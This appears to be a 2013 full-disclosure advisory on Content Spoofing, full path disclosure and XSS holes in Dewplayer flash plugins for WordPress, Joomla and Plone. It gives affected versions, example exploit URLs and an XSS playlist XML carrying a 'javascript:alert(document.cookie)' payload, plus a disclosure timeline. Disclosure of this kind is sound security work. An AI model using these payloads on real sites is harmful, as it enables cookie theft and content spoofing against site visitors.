Hello 3APA3A!
These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer. Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is media player, which is used at thousands web sites and in multiple web applications. There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others).
This flash media player is used in the next plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer.
Vulnerable are the next web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions.
Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions.
Plugins for different CMS with Dewplayer:
http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/
http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779
http://plone.org/products/collective.dewplayer
These are examples of some vulnerabilities in Dewplayer, examples of all ะกS and XSS vulnerabilities see in above-mentioned advisory.
Dewplayer for WordPress:
Plugin contains the next flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes.
Content Spoofing (Content Injection) (WASC-12):
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3
Full path disclosure (WASC-13):
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php
JosDewplayer and mosdewplayer:
Plugin JosDewplayer is based on mosdewplayer, so holes must be similar in them.
Plugin contains the next flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes.
http://site/plugins/content/josdewplayer/dewplayer.swf
collective.dewplayer:
Plugin contains the next flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes.
The path at web site can be different:
http://site/files/++resource++collective.dewplayer/dewplayer.swf
Content Spoofing (Content Injection) (WASC-12):
http://site/path/dewplayer.swf?mp3=1.mp3
XSS (WASC-08):
http://site/path/dewplayer-vinyl.swf?xml=xss.xml
xss.xml
<playlist version="1">
<trackList>
<track>
<location>javascript:alert(document.cookie)</location>
<title>XSS</title>
</track>
</trackList>
</playlist>
2013.10.25 - announced at my site.
2013.10.26 - informed developers.
2013.12.19 - disclosed at my site about Dewplayer.
2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua